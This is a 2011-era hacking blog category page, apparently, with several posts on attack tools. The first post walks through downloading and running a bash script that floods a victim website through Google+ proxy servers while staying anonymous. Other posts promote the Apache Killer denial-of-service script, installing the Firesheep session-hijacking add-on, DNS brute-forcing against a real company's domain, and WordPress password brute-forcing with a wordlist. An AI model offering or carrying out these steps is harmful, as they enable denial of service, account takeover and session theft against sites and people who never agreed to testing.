Category: Penetration Testing

Penetration Testing articles, HowTos, Techniques, Posts, Questions, Answers.

Categories
Penetration Testing Web Exploitation Tools

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy πŸ˜€

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;Β  vulnerable pages are β€œ/_/sharebox/linkpreview/β€œ Β and β€œgadgets/proxy?β€œ

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation πŸ˜€

e.g 1000Β is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

If you have any question or unable to run this, Feel free to write us πŸ™‚

Categories
Penetration Testing Web Exploitation Tools

Apache Killer – Denial of Service Flaw in Apache WebServer

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apacheΒ Β  server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix πŸ˜€

Continue reading “Apache Killer – Denial of Service Flaw in Apache WebServer”
Categories
HowTos Linux Penetration Testing Privilege Escalation

How to install FireSheep on Linux

What is FireSheep ?

Come on damn.. Its not new! πŸ˜€ Its an old firefox addon. I am explaining it here for how can you use or install it on Linux.

Lets start ;

Taking Checkout from the repository :

git clone https://github.com/codebutler/firesheep.git

Output :

Initialized empty Git repository in /root/firesheep/.git/
remote: Counting objects: 1020, done.
remote: Compressing objects: 100% (605/605), done.
remote: Total 1020 (delta 589), reused 770 (delta 402)
Receiving objects: 100% (1020/1020), 5.48 MiB | 123 KiB/s, done.
Resolving deltas: 100% (589/589), done.

cd firesheep/
git submodule update --init

Output :

Output :Submodule ‘backend/deps/http-parser’ (git://github.com/ry/http-parser.git) registered for path ‘backend/deps/http-parser’
Initialized empty Git repository in /root/firesheep/backend/deps/http-parser/.git/
remote: Counting objects: 815, done.
remote: Compressing objects: 100% (328/328), done.
remote: Total 815 (delta 549), reused 735 (delta 483)
Receiving objects: 100% (815/815), 185.18 KiB | 95 KiB/s, done.
Resolving deltas: 100% (549/549), done.
Submodule path ‘backend/deps/http-parser’: checked out ‘459507f534c807d8ba741730fbc36d4b93b133c1’

Dependencies :

apt-get install libpcap-dev xulrunner-1.9.2-dev libboost-all-dev libtool libhal-dev autoconf

Compilation :

./autogen.sh
make

DONE!

How to Load it into Firefox?

firefox build/firesheep.xpi

Categories
DNS Analysis Penetration Testing

Fierce – DNS Analysis perl script

Introduction

Fierce is a very lightweight scanner – written by RSnake in perl.. that helps you locate IP space hostnames against specified targeted domain name. It provides different techniques to gather information about your victim. This tool starts with zone transfer technique and quickly switch into brute force mode if zone transfer feature is restricted.

As you know, we are using World most favourite penetration testing distribution BackTrack Linux 5 πŸ˜‰ and this application is by default available in the distro.

Let see its different usage. I will be analyzing alibaba.com DNS records.

Fierce Usage :

Jump into the application folder

cd /pentest/enumeration/dns/fierce

Usage:

perl fierce.pl [-dns example.com] [OPTIONS]

Some known usage :

-threads ( by default it run using a single thread )
-file ( save output to a file. )
-range ( this is awsome, scan internal ip range.. but it can be only use with -dnsserver option )

In our case πŸ˜‰

perl fierce -dns alibaba.com -threads 5 -file alibaba-dns.output

You should see the following output :

Now logging to alibaba-dns.output
DNS Servers for alibaba.com:
nshz.alibabaonline.com
nsp2.alibabaonline.com
ns8.alibabaonline.com
nsp.alibabaonline.com
Trying zone transfer first…
Testing nshz.alibabaonline.com
Request timed out or transfer not allowed.
Testing nsp2.alibabaonline.com
Request timed out or transfer not allowed.
Testing ns8.alibabaonline.com
Request timed out or transfer not allowed.
Testing nsp.alibabaonline.com
Request timed out or transfer not allowed.
Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way… brute force
Checking for wildcard DNS…
** Found 97326869336.alibaba.com at 67.215.65.132.
** High probability of wildcard DNS.
Now performing 1895 test(s)…
205.204.112.6 ad.alibaba.com
205.204.112.1 au.alibaba.com
205.204.112.1 cache.alibaba.com
110.75.203.17 billing.alibaba.com
205.204.112.1 co.alibaba.com
110.75.197.7 cn.alibaba.com
205.204.116.17 channel.alibaba.com
205.204.124.3 crm.alibaba.com
—- Bingooo!! bla bla bla hundreds of thousands of records.

Categories
Penetration Testing

Penetration Testing Execution Standard

Click on Image, to view it in full size.

PTEST – Penetration Testing Execution Standard provides set of rules which helps you to do successful penetration testing. This is a technical talk stage show which offers direction on where we need to head in the security industry. David talks in-depth on the future of PEST.

Watch video and share your thoughts with us. We will be posting some very nice megazines that can help you improve your skills.

Categories
Penetration Testing Web Application Analysis

WPScan – WordPress Security Scanner

 

Exploiting, Injecting WordPress
Wordpress Blackbox testing

What is WPScan?

WPScan is wonderful and super fast wordpress vulnerability scanner written in ruby language, sponsored by RandomStorm and hosted by Googlecode. It provides you an easy way to penetrate wordpress blogs using blackbox techniques.

You can find the following stuff about any wordpress blog using this ruby application:

  • List of plugins
  • Name of theme
  • Bruce forcing Weak Password for specific user
  • Brute force username
  • Directory listings
  • Version details
  • Possible vulnerabilities.

How to Install WPScan?

Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.

Dependencies :

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

WPScan Installation :

cd /pentest/web/
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
cd wpscan

How to use WPScan?

It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.

wget http://static.hackersgarage.com/darkc0de.lst.gz
gunzip darkc0de.lst.gz

Example usage of this ant application :

Do ‘non-intrusive’ checks…
ruby ./wpscan.rb --url www.hackersgarage.com

Do wordlist password brute force on enumerated users using 50 threads…
ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the ‘admin’ username only…
ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin

Generate a new ‘most popular’ plugin list, up to 150 pages…
ruby ./wpscan.rb --generate_plugin_list 150

Enumerate instaled plugins…
ruby ./wpscan.rb --enumerate p

Still in trouble with configuration ? Ask in comments.